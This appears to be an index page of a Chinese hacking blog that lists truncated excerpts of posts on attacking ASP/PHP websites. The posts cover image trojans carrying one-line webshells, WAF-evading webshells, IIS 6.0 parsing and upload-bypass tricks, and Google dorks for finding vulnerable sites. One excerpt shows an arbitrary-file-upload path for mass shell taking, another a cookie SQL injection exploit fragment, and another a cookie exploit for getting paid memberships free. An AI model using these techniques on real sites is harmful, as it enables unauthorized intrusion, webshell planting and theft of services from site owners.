主要亮点:图片木马(可以正常打开显示的木马) 先看代码: 仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。 0dayhack、找一张图片,名字改成0dayhack.jpg 2、 <%...
颓废's Blog
颓废's Blog
颓废's Blog
上传解析漏洞大概总结
IIS 6.0 解析利用方法有两种 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。 例如...
颓废's Blog
最新asp+php过狗一句话
自己一直再用的asp和php一句话 文件名稱:响应国家号召,禁止资源下载
颓废's Blog
cookie漏洞利用过程-asp300漏洞利用过程,免费升级298元的会员
前言: asp300.net是个源码下载网站,内容来自其他付费源码论坛的资源,基本上常见的源码都可以下载到。
颓废's Blog
谷歌搜关键字找网站漏洞合集
谷歌地址 http://soguge.com/ https://g2.wen.lu/ https://www.gogfw.com/ 到GoogLe,搜索一些关键字,edit.asp...
颓废's Blog
上传绕过姿势汇总一字见血版
一字见血 秒看秒懂 1. filename在content-type下面 2. .asp{80-90} 3. NTFS ADS 4. .asp... 5. bounda...
颓废's Blog
不一般的渗透思路
1,ODAY比较多,你一天可以用ODAY日下很多系统的站,然后提交到中国被黑站点上,显示你的能力,何苦? 2,ASP类型,PHP类型注入的站,确实还是存在,你同样MD5破解,然后进后台拿个SHELL权...
颓废's Blog
ewebeditor编辑器漏洞总结
1、关键文件的名称和路径 Admin_Login.asp 登录页面 Admin_Default.asp 管理首页 Admin_Style.asp Admin_UploadFile.asp Upload...
颓废's Blog
任意文件上传漏洞批量拿SHELL
谷歌关键字:inurl:newslist.asp?NodeCode= 利用方式:/admin/uploadfile.asp?uppath=mad.asp&upname=&a...
颓废's Blog
asp类型网站漏洞0day总结
启航企业建站系统 cookie注入漏洞通杀所有版本 直接上exploit: javascript:alert(document.cookie="id="+escape("1 and...
颓废's Blog
W78cms网站管理系统漏洞
W78CMS企业网站管理系统是一套用的比较多的基于ASP程序的网站管理系统,在中国站长站的源程序下载量突破了一万一千次。前几天在tOOls.net看到有人公布了一个W78CMS企业...
颓废's Blog
网站漏洞关键字总结
挖掘鸡关键字 关键字:powerwendayver1.0 添加:/db/pw_sys_data.mdb 关键字:poweredbywebboy 添加:/upfile....
